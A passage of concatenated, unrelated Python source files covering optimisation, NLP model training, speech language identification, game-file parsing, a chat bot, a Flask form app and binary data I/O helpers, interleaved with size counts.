range(n): #m.addConstr(sum(x[i]) == 1) #****************************************************************************************************** m.addConstr(sum(x[i]) == 1 * (1-y[i])) #****************************************************************************************************** m.optimize() runtime = m.Runtime print("The run time is %f" % runtime) print("Obj:", m.objVal) 
#****************************************************************************************************** dom_set_size = 0 solution = [] assignment = [] center = 0 vertex_j = 1 vertex_i = 1 for v in m.getVars(): varName = v.varName if varName[0] == 'y': if v.x == 1.0: dom_set_size = dom_set_size + 1 solution.append(varName[1:]) else: if vertex_j <= n: if v.x == 1.0: assignment.append([vertex_i, vertex_j]) else: vertex_i = vertex_i + 1 vertex_j = 1 vertex_j = vertex_j + 1 print("Cap. dom. set cardinality: " + str(dom_set_size)) solution = [int(i) for i in solution] #print("solution: " + str(solution)) #print("assignment: " + str(assignment)) print('{"instance": "%s",' % input_file) print('"centers": [') counter = 0 for center in solution: counter = counter + 1 nodes = [] for node in assignment: if node[1] == center: nodes.append(node[0]) if counter == len(solution): print('{ "center": ' + str(center) + ', "nodes": ' + str(nodes) + '}') else: print('{ "center": ' + str(center) + ', "nodes": ' + str(nodes) + '},') print(']}') #print('%s %g' % (v.varName, v.x)) #****************************************************************************************************** # {"instance": "/home/ckc/Escritorio/pr124.tsp", # "outliers": [83,40,115,114], # "centers": [ { "center": 59, "nodes": [28,32,33,34,35,54,57,58,59,60,61,64,65]}, # { "center": 102, "nodes": [101,102,103,104,105,106,107,108,109,110,111,112,113]}, # { "center": 8, "nodes": [8,9,10,11,12,13,14,15,16,46,47,48,49]}, # { "center": 79, "nodes": [77,78,79,91,92,93,94,95,96,97,98,99,123]}, # { "center": 6, "nodes": [0,1,2,3,4,5,6,7,26,27,29,30,31]}, # { "center": 36, "nodes": [19,20,21,22,23,24,25,36,37,38,39,55,56]}, # { "center": 16, "nodes": [17,18,40,41,42,43,44,45,50,51,52,53]}, # { "center": 96, "nodes": [72,73,74,75,76,80,116,117,118,119,120,121,122]}, # { "center": 89, "nodes": [84,85,86,87,88,89,90,100]}, # { "center": 64, "nodes": [62,63,66,67,68,69,70,71,81,82,83,114,115]} # ]} num_centers = dom_set_size # 
num_centers = m.objVal except GurobiError: print("Error reported") def binarySearch(): global total_runtime, k, runtime, num_centers, input_file total_runtime = 0 not_done = True upper = len(ordered_sizes) - 1 lower = 0 best_solution_size = float("inf") while not_done: #mid = math.ceil(lower + ((upper - lower)/2)) mid = math.ceil((upper + lower) /2) mid_value = ordered_sizes[int(mid)] if mid == upper: not_done = False run(mid_value) total_runtime = total_runtime + runtime else: run(mid_value) total_runtime = total_runtime + runtime if num_centers <= k: upper = mid print("UPPER = MID") if mid_value <= best_solution_size: best_solution_size = mid_value else: lower = mid print("LOWER = MID") print("best solution size: " + str(best_solution_size)) print("total runtime: " + str(total_runtime)) if __name__ == "__main__": global total_runtime, k, runtime, num_centers, L, n if len(sys.argv) != 6: print ("Wrong number of arguments") print ("exact input_file_path n k L instance_format") sys.exit() input_file = sys.argv[1] n = int(sys.argv[2]) k = int(sys.argv[3]) L = int(sys.argv[4]) instance_format = sys.argv[5] createGraph(input_file, instance_format) binarySearch()
10,060
3,487
# Mod00.py print('name: {}'.format(__name__)) import Calc00 import Calc00 as c from Calc00 import * x= 20; y= 10; Calc00.Sum(x, y) c.Sub(x,y) Mul(x,y) import sys for path in sys.path: print(path)
204
105
from collections import namedtuple from fbchat import Client from fbchat.models import ThreadType class Bot(Client): Command = namedtuple('Command', ['func', 'admin', 'directed']) def __init__(self, email, password, name, admins=[], protected=[], *args, **kwargs): super(Bot, self).__init__(email=email, password=password, *args, **kwargs) self.name = name self.protected = protected + admins self.admins = admins self.commands = {} self.add_message_handler("help", self.commands_cmd) def commands_cmd(self, msg): """Print this message.""" def get_commands(): return self.commands.iteritems() commands_msg = "You can say:\n" for kword, cmd in sorted(get_commands(), key=lambda x: x[1].admin): admin_msg = " (admin only)" if cmd.admin else "" commands_msg += "{}:{} {}\n".format(kword, admin_msg, cmd.func.__doc__) self.sendMessage(commands_msg, msg['thread_id'], msg['thread_type']) def add_message_handler(self, kword, func, admin=False, directed=True): self.commands[kword] = Bot.Command(func, admin, directed) def onMessage(self, **kwargs): super(Bot, self).onMessage(**kwargs) if kwargs['author_id'] == self.uid: return is_admin = kwargs['author_id'] in self.admins is_directed = kwargs['message'].startswith("@" + self.name) is_dm = kwargs['thread_type'] == ThreadType.USER if is_directed: kwargs['message'] = kwargs['message'].split("@" + self.name)[1].strip() kword = kwargs['message'].split(' ', 1)[0].lower() cmd = self.commands.get(kword) if (cmd and (not cmd.admin or is_admin) and (not cmd.directed or is_directed or is_dm)): cmd.func(kwargs)
1,887
568
import debian class WindowsWSL(debian.DebianBox): model = ('windows_wsl')
80
30
from functools import lru_cache from transformers import pipeline @lru_cache def load_zeroshot_model(model_name="valhalla/distilbart-mnli-12-6"): classifier = pipeline("zero-shot-classification", model=model_name) return classifier
242
82
table={i:j for i,j in enumerate("abcdefghijklmnopqrstuvwxyz"+"abcdefghijklmnopqrstuvwxyz".upper())} def decode(cipher, b, c): cipher.insert(0, 0) res=[] for i in range(1, len(cipher)): res.append(table[cipher[i]-cipher[i-1]-b-c]) return "".join(res)
273
122
from .habappschedulerview import HABAppSchedulerView
53
16
# Generated by Django 3.0.3 on 2020-05-06 22:02 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('cases', '0001_initial'), ] operations = [ migrations.AddField( model_name='visual', name='id', field=models.AutoField(auto_created=True, default=4, primary_key=True, serialize=False, verbose_name='ID'), preserve_default=False, ), migrations.AlterField( model_name='visual', name='country', field=models.CharField(max_length=255), ), ]
627
196
#!/usr/bin/env python #encoding=utf-8 ''' @Time : 2020/10/25 22:28:30 @Author : zhiyang.zzy @Contact : zhiyangchou@gmail.com @Desc : 训练相似度模型 1. siamese network,分别使用 cosine、曼哈顿距离 2. triplet loss ''' # here put the import lib from model.bert_classifier import BertClassifier import os import time from numpy.lib.arraypad import pad import nni from tensorflow.python.ops.gen_io_ops import write_file import yaml import logging import argparse logging.basicConfig(level=logging.INFO) import data_input from config import Config from model.siamese_network import SiamenseRNN, SiamenseBert from data_input import Vocabulary, get_test from util import write_file def train_siamese(): # 读取配置 # conf = Config() cfg_path = "./configs/config.yml" cfg = yaml.load(open(cfg_path, encoding='utf-8'), Loader=yaml.FullLoader) # 读取数据 data_train, data_val, data_test = data_input.get_lcqmc() # data_train = data_train[:100] print("train size:{},val size:{}, test size:{}".format( len(data_train), len(data_val), len(data_test))) model = SiamenseRNN(cfg) model.fit(data_train, data_val, data_test) pass def predict_siamese(file_='./results/'): # 加载配置 cfg_path = "./configs/config.yml" cfg = yaml.load(open(cfg_path, encoding='utf-8'), Loader=yaml.FullLoader) # 将 seq转为id, vocab = Vocabulary(meta_file='./data/vocab.txt', max_len=cfg['max_seq_len'], allow_unk=1, unk='[UNK]', pad='[PAD]') test_arr, query_arr = get_test(file_, vocab) # 加载模型 model = SiamenseRNN(cfg) model.restore_session(cfg["checkpoint_dir"]) test_label, test_prob = model.predict(test_arr) out_arr = [x + [test_label[i]] + [test_prob[i]] for i, x in enumerate(query_arr)] write_file(out_arr, file_ + '.siamese.predict', ) pass def train_siamese_bert(): # 读取配置 # conf = Config() cfg_path = "./configs/config_bert.yml" cfg = yaml.load(open(cfg_path, encoding='utf-8'), Loader=yaml.FullLoader) # 自动调参的参数,每次会更新一组搜索空间中的参数 tuner_params= nni.get_next_parameter() cfg.update(tuner_params) # vocab: 将 seq转为id, vocab = Vocabulary(meta_file='./data/vocab.txt', 
max_len=cfg['max_seq_len'], allow_unk=1, unk='[UNK]', pad='[PAD]') # 读取数据 data_train, data_val, data_test = data_input.get_lcqmc_bert(vocab) # data_train = data_train[:100] print("train size:{},val size:{}, test size:{}".format( len(data_train), len(data_val), len(data_test))) model = SiamenseBert(cfg) model.fit(data_train, data_val, data_test) pass def predict_siamese_bert(file_="./results/input/test"): # 读取配置 # conf = Config() cfg_path = "./configs/config_bert.yml" cfg = yaml.load(open(cfg_path, encoding='utf-8'), Loader=yaml.FullLoader) os.environ["CUDA_VISIBLE_DEVICES"] = "4" # vocab: 将 seq转为id, vocab = Vocabulary(meta_file='./data/vocab.txt', max_len=cfg['max_seq_len'], allow_unk=1, unk='[UNK]', pad='[PAD]') # 读取数据 test_arr, query_arr = data_input.get_test_bert(file_, vocab) print("test size:{}".format(len(test_arr))) model = SiamenseBert(cfg) model.restore_session(cfg["checkpoint_dir"]) test_label, test_prob = model.predict(test_arr) out_arr = [x + [test_label[i]] + [test_prob[i]] for i, x in enumerate(query_arr)] write_file(out_arr, file_ + '.siamese.bert.predict', ) pass def train_bert(): # 读取配置 # conf = Config() cfg_path = "./configs/bert_classify.yml" cfg = yaml.load(open(cfg_path, encoding='utf-8'), Loader=yaml.FullLoader) # 自动调参的参数,每次会更新一组搜索空间中的参数 tuner_params= nni.get_next_parameter() cfg.update(tuner_params) # vocab: 将 seq转为id, vocab = Vocabulary(meta_file='./data/vocab.txt', max_len=cfg['max_seq_len'], allow_unk=1, unk='[UNK]', pad='[PAD]') # 读取数据 data_train, data_val, data_test = data_input.get_lcqmc_bert(vocab, is_merge=1) # data_train = data_train[:100] print("train size:{},val size:{}, test size:{}".format( len(data_train), len(data_val), len(data_test))) model = BertClassifier(cfg) model.fit(data_train, data_val, data_test) pass def predict_bert(file_="./results/input/test"): # 读取配置 # conf = Config() cfg_path = "./configs/bert_classify.yml" cfg = yaml.load(open(cfg_path, encoding='utf-8'), Loader=yaml.FullLoader) # vocab: 将 seq转为id, vocab = 
Vocabulary(meta_file='./data/vocab.txt', max_len=cfg['max_seq_len'], allow_unk=1, unk='[UNK]', pad='[PAD]') # 读取数据 test_arr, query_arr = data_input.get_test_bert(file_, vocab, is_merge=1) print("test size:{}".format(len(test_arr))) model = BertClassifier(cfg) model.restore_session(cfg["checkpoint_dir"]) test_label, test_prob = model.predict(test_arr) out_arr = [x + [test_label[i]] + [test_prob[i]] for i, x in enumerate(query_arr)] write_file(out_arr, file_ + '.bert.predict', ) pass def siamese_bert_sentence_embedding(file_="./results/input/test.single"): # 输入一行是一个query,输出是此query对应的向量 # 读取配置 cfg_path = "./configs/config_bert.yml" cfg = yaml.load(open(cfg_path, encoding='utf-8'), Loader=yaml.FullLoader) cfg['batch_size'] = 64 os.environ["CUDA_VISIBLE_DEVICES"] = "7" # vocab: 将 seq转为id, vocab = Vocabulary(meta_file='./data/vocab.txt', max_len=cfg['max_seq_len'], allow_unk=1, unk='[UNK]', pad='[PAD]') # 读取数据 test_arr, query_arr = data_input.get_test_bert_single(file_, vocab) print("test size:{}".format(len(test_arr))) model = SiamenseBert(cfg) model.restore_session(cfg["checkpoint_dir"]) test_label = model.predict_embedding(test_arr) test_label = [",".join([str(y) for y in x]) for x in test_label] out_arr = [[x, test_label[i]] for i, x in enumerate(query_arr)] print("write to file...") write_file(out_arr, file_ + '.siamese.bert.embedding', ) pass if __name__ == "__main__": os.environ["CUDA_VISIBLE_DEVICES"] = "4" ap = argparse.ArgumentParser() ap.add_argument("--method", default="bert", type=str, help="train/predict") ap.add_argument("--mode", default="train", type=str, help="train/predict") ap.add_argument("--file", default="./results/input/test", type=str, help="train/predict") args = ap.parse_args() if args.mode == 'train' and args.method == 'rnn': train_siamese() elif args.mode == 'predict' and args.method == 'rnn': predict_siamese(args.file) elif args.mode == 'train' and args.method == 'bert_siamese': train_siamese_bert() elif args.mode == 'predict' and 
args.method == 'bert_siamese': predict_siamese_bert(args.file) elif args.mode == 'train' and args.method == 'bert': train_bert() elif args.mode == 'predict' and args.method == 'bert': predict_bert(args.file) elif args.mode == 'predict' and args.method == 'bert_siamese_embedding': # 此处输出句子的 embedding,如果想要使用向量召回 # 建议训练模型的时候,损失函数使用功能和faiss一致的距离度量,例如faiss中使用是l2,那么损失函数用l2 # faiss距离用cos,损失函数用cosin,或者损失中有一项是cosin相似度损失 siamese_bert_sentence_embedding(args.file)
7,048
2,947
import os
import random
import argparse
import torch
import torch.nn as nn
# BUG FIX: pack_padded_sequence was referenced as `rnn_utils`/`rnn_util`
# without an explicit import; import it once under the canonical name.
import torch.nn.utils.rnn as rnn_utils
import numpy as np
from torch.utils.data import DataLoader
from tqdm import tqdm
from model import *
from Loss import *
from data_load import *
from model_evaluation import *

# python train_blstm_e2e.py --savedir "/home/hexin/Desktop/models" \
#   --train "/home/hexin/Desktop/data/train.txt" --test "/home/hexin/Desktop/data/test.txt" \
#   --seed 0 --device 0 --batch 8 --epochs 60 --dim 23 --lang 3 \
#   --model my_sa_e2e --lr 0.00001 --lambda 0.5


def setup_seed(seed):
    """Seed every RNG in use and force deterministic cuDNN for reproducibility."""
    torch.manual_seed(seed)
    torch.cuda.manual_seed_all(seed)
    np.random.seed(seed)
    torch.backends.cudnn.deterministic = True
    torch.backends.cudnn.benchmark = False


def get_lr(optimizer):
    """Return the learning rate of the optimizer's first parameter group."""
    for param_group in optimizer.param_groups:
        return param_group['lr']


def get_output(outputs, seq_len):
    """Concatenate the valid (unpadded) frames of a padded batch.

    Args:
        outputs: (batch, max_len, n_class) tensor of per-frame outputs.
        seq_len: iterable of true lengths, one per batch item.

    Returns:
        (sum(seq_len), n_class) tensor, or 0 for an empty batch
        (0 is kept from the original implementation's behavior).
    """
    if len(seq_len) == 0:
        return 0
    return torch.cat(
        [outputs[i, :length, :] for i, length in enumerate(seq_len)], dim=0)


def main():
    """Train the BLSTM E2E LID model and keep the best-accuracy checkpoint."""
    parser = argparse.ArgumentParser(description='paras for making data')
    parser.add_argument('--model', type=str, help='model name', default='my_BLSTM')
    parser.add_argument('--savedir', type=str, help='dir in which the trained model is saved')
    parser.add_argument('--train', type=str, help='training data, in .txt')
    parser.add_argument('--test', type=str, help='testing data, in .txt')
    parser.add_argument('--seed', type=int, help='random seed', default=0)
    parser.add_argument('--batch', type=int, help='batch size', default=8)
    parser.add_argument('--device', type=int, help='Device name', default=0)
    parser.add_argument('--epochs', type=int, help='num of epochs', default=120)
    parser.add_argument('--dim', type=int, help='dim of input features', default=437)
    parser.add_argument('--lang', type=int, help='num of language classes', default=3)
    parser.add_argument('--lr', type=float, help='initial learning rate', default=0.0001)
    parser.add_argument('--lambda', type=float, help='hyperparameter for joint training', default=0.5)
    args = parser.parse_args()
    # BUG FIX: `args.lambda` is a SyntaxError ('lambda' is a reserved word);
    # fetch the attribute through getattr instead.
    lam = getattr(args, 'lambda')

    setup_seed(args.seed)
    device = torch.device('cuda:{}'.format(args.device)
                          if torch.cuda.is_available() else 'cpu')

    # load model
    model = BLSTM_E2E_LID(n_lang=args.lang,
                          dropout=0.25,
                          input_dim=args.dim,
                          hidden_size=256,
                          num_emb_layer=2,
                          num_lstm_layer=3,
                          emb_dim=256)
    model.to(device)
    loss_func_DCL = DeepClusteringLoss().to(device)
    loss_func_CRE = nn.CrossEntropyLoss().to(device)

    # load data
    train_set = RawFeatures(args.train)
    valid_set = RawFeatures(args.test)
    train_data = DataLoader(dataset=train_set,
                            batch_size=args.batch,
                            pin_memory=True,
                            num_workers=16,
                            shuffle=True,
                            collate_fn=collate_fn)
    valid_data = DataLoader(dataset=valid_set,
                            batch_size=1,
                            pin_memory=True,
                            shuffle=False,
                            collate_fn=collate_fn)

    # optimizer & learning rate decay strategy
    optimizer = torch.optim.Adam(model.parameters(), lr=args.lr)
    scheduler = torch.optim.lr_scheduler.CosineAnnealingLR(optimizer, T_max=args.epochs)

    # BUG FIX: honor --savedir instead of a hardcoded path; keep the original
    # path as fallback for backward compatibility.
    save_dir = args.savedir if args.savedir else '/home/hexin/Desktop/models/'

    # Train the model
    total_step = len(train_data)
    best_acc = 0
    best_eer = 0  # BUG FIX: previously unbound if no epoch improved accuracy
    for epoch in tqdm(range(args.epochs)):
        model.train()
        for step, (utt, labels, seq_len) in enumerate(train_data):
            utt_ = utt.to(device=device, dtype=torch.float)
            utt_ = rnn_utils.pack_padded_sequence(utt_, seq_len, batch_first=True)
            # BUG FIX: was `rnn_util` (NameError); only the valid (unpadded)
            # label frames are kept via .data.
            labels_ = rnn_utils.pack_padded_sequence(labels, seq_len, batch_first=True).data.to(device)
            # Forward pass
            outputs, embeddings = model(utt_)
            loss_DCL = loss_func_DCL(embeddings, labels_)
            loss_CRE = loss_func_CRE(outputs, labels_)
            # joint objective: lambda * cross-entropy + (1-lambda) * deep clustering
            loss = lam * loss_CRE + (1 - lam) * loss_DCL
            # Backward and optimize
            optimizer.zero_grad()
            loss.backward()
            optimizer.step()
            if step % 200 == 0:
                print("Epoch [{}/{}], Step [{}/{}] Loss: {:.4f} CRE: {:.4f} DCL: {:.4f}"
                      .format(epoch + 1, args.epochs, step + 1, total_step,
                              loss.item(), loss_CRE.item(), loss_DCL.item()))
        scheduler.step()

        # validation: accuracy and per-language EER on the held-out set
        model.eval()
        correct = 0
        total = 0
        eer = 0
        FAR_list = torch.zeros(args.lang)
        FRR_list = torch.zeros(args.lang)
        with torch.no_grad():
            for step, (utt, labels, seq_len) in enumerate(valid_data):
                utt = utt.to(device=device, dtype=torch.float)
                utt_ = rnn_utils.pack_padded_sequence(utt, seq_len, batch_first=True)
                labels_ = rnn_utils.pack_padded_sequence(labels, seq_len, batch_first=True).data.to(device)
                outputs, embeddings = model(utt_)
                predicted = torch.argmax(outputs, -1)
                total += labels.size(-1)
                correct += (predicted == labels_).sum().item()
                FAR, FRR = compute_far_frr(args.lang, predicted, labels_)
                FAR_list += FAR
                FRR_list += FRR
        acc = correct / total
        print('Current Acc.: {:.4f} %'.format(100 * acc))
        for i in range(args.lang):
            eer_ = (FAR_list[i] / total + FRR_list[i] / total) / 2
            eer += eer_
            print("EER for label {}: {:.4f}%".format(i, eer_ * 100))
        print('EER: {:.4f} %'.format(100 * eer / args.lang))
        if acc > best_acc:
            print('New best Acc.: {:.4f}%, EER: {:.4f} %, model saved!'
                  .format(100 * acc, 100 * eer / args.lang))
            best_acc = acc
            best_eer = eer / args.lang
            torch.save(model.state_dict(),
                       os.path.join(save_dir, '{}.ckpt'.format(args.model)))
    # BUG FIX: format spec was `{.4f}` (missing colon), which raises ValueError
    print('Final Acc: {:.4f}%, Final EER: {:.4f}%'.format(100 * best_acc, 100 * best_eer))


if __name__ == "__main__":
    main()
6,517
2,151
from construct import *
from .common import *

"""
Formats: w3u, w3t, w3b, w3h, w3d, w3a, w3q
Version: 1

The objects file contains data that the object editor would typically
manipulate. If dealing with abilities, doodads or upgrades, the
ObjectsWithVariationsFile is used instead of the ObjectsFile. Optionally,
the ObjectsBestFitFile can be used as well which tries to parse the file
with both formats--one should always fail when used with the other, so it
selects whichever didn't fail. Performance should be really bad on this.
"""


class ObjectModificationTerminatorValidator(Validator):
    # Each modification record is terminated by a 4-byte field that is either
    # all zeroes or repeats one of the enclosing object's ids; accept exactly
    # those three values.  `ctx._` reaches the parent (ObjectDefinition) scope.
    def _validate(self, obj, ctx, path):
        return obj in [b"\x00\x00\x00\x00", ctx._.new_object_id, ctx._.original_object_id]


# One field override: which field (4-char id), the value's wire type, the
# value itself, and the terminator validated above.
ObjectModification = Struct(
    "modification_id" / ByteId,
    "value_type" / Enum(Integer, INT=0, REAL=1, UNREAL=2, STRING=3),
    # REAL and UNREAL are both stored as 32-bit floats on the wire.
    "value" / Switch(this.value_type, {
        "INT": Integer,
        "REAL": Float,
        "UNREAL": Float,
        "STRING": String
    }),
    "parent_object_id" / ObjectModificationTerminatorValidator(ByteId)
)

# A (base object, new object) pair plus its list of field overrides.
ObjectDefinition = Struct(
    "original_object_id" / ByteId,
    "new_object_id" / ByteId,
    "modifications_count" / Integer,
    "modifications" / Array(this.modifications_count, ObjectModification)
)

ObjectTable = Struct(
    "objects_count" / Integer,
    "objects" / Array(this.objects_count, ObjectDefinition)
)

# Layout for units/items/destructables/quests (no per-variation data):
# a version header followed by the stock and custom object tables.
ObjectsFile = Struct(
    "version" / Integer,
    "original_objects_table" / ObjectTable,
    "custom_objects_table" / ObjectTable
)

# Same as ObjectModification but with two extra fields (variation index and
# ability data column) used by abilities, doodads and upgrades.
ObjectModificationWithVariation = Struct(
    "modification_id" / ByteId,
    "value_type" / Enum(Integer, INT=0, REAL=1, UNREAL=2, STRING=3),
    "variation" / Integer,
    "ability_data_column" / Enum(Integer, A=0, B=1, C=2, D=3, F=4, G=5, H=6),
    "value" / Switch(this.value_type, {
        "INT": Integer,
        "REAL": Float,
        "UNREAL": Float,
        "STRING": String
    }),
    "parent_object_id" / ObjectModificationTerminatorValidator(ByteId)
)

ObjectDefinitionWithVariations = Struct(
    "original_object_id" / ByteId,
    "new_object_id" / ByteId,
    "modifications_count" / Integer,
    "modifications" / Array(this.modifications_count, ObjectModificationWithVariation)
)

ObjectTableWithVariations = Struct(
    "objects_count" / Integer,
    "objects" / Array(this.objects_count, ObjectDefinitionWithVariations)
)

ObjectsWithVariationsFile = Struct(
    "version" / Integer,
    "original_objects_table" / ObjectTableWithVariations,
    "custom_objects_table" / ObjectTableWithVariations
)

# Try the variations layout first, then fall back to the plain layout; the
# wrong one should always fail to parse (slow, as noted in the module docstring).
ObjectsBestFitFile = Select(ObjectsWithVariationsFile, ObjectsFile)
2,551
880
import pickle
from collections import defaultdict
from helper_functions import format_lemma, get_blends_csv
from os import listdir
import networkx as nx


def saldo_obj(filename):
    """Parse a SALDO lexicon dump into {lemma: (pos, father, mother, lemma_id)}.

    Lines starting with '#' are skipped; fields are tab-separated.
    NOTE(review): columns 1 and 2 are read as `mother` and `father` but stored
    in (father, mother) order -- confirm against the SALDO file format.
    """
    saldo = defaultdict(int)
    with open(filename) as f:
        for line in f:
            if line.startswith('#'):
                continue
            line = line.split('\t')
            # part-of-speech is the second-to-last column, upper-cased
            pos = line[-2].upper()
            lemma_id = line[0]
            # lemma ids look like "word..n.1"; the part before ".." is the lemma
            lemma = line[0].split('..')[0].lower()
            mother = line[1]
            father = line[2]
            saldo[lemma] = (pos, father, mother, lemma_id)
    return saldo


# def construct_network(saldo):
#     G = nx.DiGraph()
#     for k, (_, m, f, li) in saldo.items():
#         if m not in G.nodes:
#             G.add_node(m)
#         if f not in G.nodes:
#             G.add_node(m)
#         if li not in G.nodes:
#             G.add_node(li)
#         if k not in G.nodes:
#             G.add('_' + k)
#         if G.has_edge(li, k):
#             G[k][li]['weight'] += 1
#         else:
#             G.add_edge(k, li, weight=1)
#     if G.jas


def get_candidates():
    """Collect the set of all component words from the blend-candidate files.

    Each candidate file holds 'word1,word2' lines; both words are added.
    NOTE(review): paths are hardcoded to a local machine; `corpus` is unused.
    """
    lexicon = 'saldo'
    corpus = 'news'
    candidate_folder = f'/home/adam/Documents/lexical_blends_project/{lexicon}_blends_candidates_noverlap_1/'
    c_set = set()
    for i, filename in enumerate(listdir(candidate_folder)):
        # file name convention: "<blend>_...": the blend word precedes '_'
        blend = filename.split('_')[0]
        print('### reading blend:', i, blend)
        with open(candidate_folder+filename) as f:
            for ln in f:
                cw1, cw2 = ln.rstrip().split(',')
                c_set.add(cw1)
                c_set.add(cw2)
    return c_set


def nst_obj(filename):
    """Parse the NST pronunciation lexicon into {word: (pos, sampa)}.

    The file is ';'-separated, latin-1 encoded; lines starting with '!' or '-'
    are skipped.  Multi-valued POS tags ('A|B') are reduced to the first tag.
    """
    nst = defaultdict(int)
    with open(filename, encoding='iso-8859-1') as f:
        for i, line in enumerate(f):
            if line.startswith('!') or line.startswith('-'):
                continue
            line = line.split(';')
            seg = line[0]
            pos = line[1]
            # column 11 holds the SAMPA transcription
            sampa = line[11]
            while '|' in pos:
                pos = pos.split('|')[0]
            nst[seg.lower()] = (pos, sampa)
    return nst


if __name__ == '__main__':
    # One-off pickling of the lexica (kept commented out after the first run):
    #with open('/home/adam/Documents/lexical_blends_project/data/nst_lex.pickle', '+wb') as f:
    #    nst = nst_obj('/home/adam/data/NST_svensk_leksikon/swe030224NST.pron/swe030224NST.pron')
    #    pickle.dump(nst, f)
    #with open('/home/adam/Documents/lexical_blends_project/data/saldo_lex.pickle', '+wb') as f:
    #    saldo = saldo_obj('/home/adam/data/saldo_2.3/saldo20v03.txt')
    #    pickle.dump(saldo, f)
    with open('/home/adam/Documents/lexical_blends_project/data/nst_lex.pickle', 'rb') as f:
        nst = pickle.load(f)
    with open('/home/adam/Documents/lexical_blends_project/data/saldo_lex.pickle', 'rb') as f:
        saldo = pickle.load(f)
    c_set = get_candidates()
    print(list(saldo.keys())[:100])
    print(list(nst.keys())[:100])
    n_set = set(nst.keys())
    s_set = set(saldo.keys())
    # fraction of candidate component words covered by the NST lexicon
    true = len(c_set.intersection(n_set))/len(c_set)
    print(true)
3,078
1,139
from flask import Flask, render_template, redirect, url_for
from flask_bootstrap import Bootstrap
from flask_wtf import FlaskForm
from wtforms import StringField, SubmitField
from wtforms.validators import Required
import csv

app = Flask(__name__)
app.config['DEBUG'] = True

# Flask-WTF requires an encryption key - the string can be anything
app.config['SECRET_KEY'] = '8BYkEfBA6O6donzWlSihBXox7C0sKR6b'

# Flask-Bootstrap requires this line
Bootstrap(app)

# ---------------------------------------------------------------------------
# with Flask-WTF, each web form is represented by a class
# "RestForm" can be changed; "(FlaskForm)" cannot
# see the route for "/" to see how this is used


class RestForm(FlaskForm):
    """Form with a single required restaurant-name field."""
    restaurant = StringField('Restaurant name', validators=[Required()])
    submit = SubmitField('Submit')

# Exercise:
# add: address, city, state, zip, phone, url, cuisine, price_range
# make price_range a select element with choice of $ to $$$$
# make all fields required except submit

# ---------------------------------------------------------------------------
# all Flask routes below


@app.route('/', methods=['GET', 'POST'])
def index():
    """Render the restaurant entry form."""
    form = RestForm()
    # Exercise:
    # Make the form write a new row into restaurants.csv
    # with if form.validate_on_submit()
    return render_template('index.html', form=form)


@app.route('/restaurants')
def restaurants():
    """Render all rows from restaurants.csv.

    BUG FIX: the file is now opened with a context manager so the handle is
    closed even if reading raises (the original open()/close() pair leaked
    the handle on error).
    """
    with open('restaurants.csv', newline='') as csvfile:
        list_of_rows = list(csv.reader(csvfile, delimiter=','))
    return render_template('rest.html', rests=list_of_rows)


# keep this as is
if __name__ == '__main__':
    app.run(debug=True)
1,737
530
#!/usr/bin/env python """ io_tools Functions to load data """ from __future__ import absolute_import import os import sys import json import numpy as np __author__ = "Xin Wang" __email__ = "wangxin@nii.ac.jp" __copyright__ = "Copyright 2020, Xin Wang" def f_read_raw_mat(filename, col, data_format='f4', end='l'): """read_raw_mat(filename,col,data_format='float',end='l') Read the binary data from filename Return data, which is a (N, col) array filename: the name of the file, take care about '\\' col: the number of column of the data format: please use the Python protocal to write format default: 'f4', float32 see for more format: end: little endian 'l' or big endian 'b'? default: 'l' dependency: numpy Note: to read the raw binary data in python, the question is how to interprete the binary data. We can use struct.unpack('f',read_data) to interprete the data as float, however, it is slow. """ f = open(filename,'rb') if end=='l': data_format = '<'+data_format elif end=='b': data_format = '>'+data_format else: data_format = '='+data_format datatype = np.dtype((data_format,(col,))) data = np.fromfile(f,dtype=datatype) f.close() if data.ndim == 2 and data.shape[1] == 1: return data[:,0] else: return data def f_read_raw_mat_length(filename, data_format='f4'): """f_read_raw_mat_length(filename,data_format='float',end='l') Read length of data """ f = open(filename,'rb') tmp = f.seek(0, 2) bytes_num = f.tell() f.close() if data_format == 'f4': return int(bytes_num / 4) else: return bytes_num def f_read_htk(filename, data_format='f4', end='l'): """read_htk(filename, data_format='f4', end='l') Read HTK File and return the data as numpy.array filename: input file name data_format: the data_format of the data default: 'f4' float32 end: little endian 'l' or big endian 'b'? 
default: 'l' """ if end=='l': data_format = '<'+data_format data_formatInt4 = '<i4' data_formatInt2 = '<i2' elif end=='b': data_format = '>'+data_format data_formatInt4 = '>i4' data_formatInt2 = '>i2' else: data_format = '='+data_format data_formatInt4 = '=i4' data_formatInt2 = '=i2' head_type = np.dtype([('nSample',data_formatInt4), ('Period',data_formatInt4), ('SampleSize',data_formatInt2), ('kind',data_formatInt2)]) f = open(filename,'rb') head_info = np.fromfile(f,dtype=head_type,count=1) """if end=='l': data_format = '<'+data_format elif end=='b': data_format = '>'+data_format else: data_format = '='+data_format """ if 'f' in data_format: sample_size = int(head_info['SampleSize'][0]/4) else: print("Error in read_htk: input should be float32") return False datatype = np.dtype((data_format,(sample_size,))) data = np.fromfile(f,dtype=datatype) f.close() return data def f_read_htk_length(filename, data_format='f4', end='l'): """read_htk(filename, data_format='f4', end='l') Read HTK File and return the data as numpy.array filename: input file name data_format: the data_format of the data default: 'f4' float32 end: little endian 'l' or big endian 'b'? default: 'l' """ if end=='l': data_format = '<'+data_format data_formatInt4 = '<i4' data_formatInt2 = '<i2' elif end=='b': data_format = '>'+data_format data_formatInt4 = '>i4' data_formatInt2 = '>i2' else: data_format = '='+data_format data_formatInt4 = '=i4' data_formatInt2 = '=i2' head_type = np.dtype([('nSample',data_formatInt4), ('Period',data_formatInt4), ('SampleSize',data_formatInt2), ('kind',data_formatInt2)]) f = open(filename,'rb') head_info = np.fromfile(f,dtype=head_type,count=1) f.close() sample_size = int(head_info['SampleSize'][0]/4) return sample_size def f_write_raw_mat(data,filename,data_format='f4',end='l'): """write_raw_mat(data,filename,data_format='',end='l') Write the binary data from filename. 
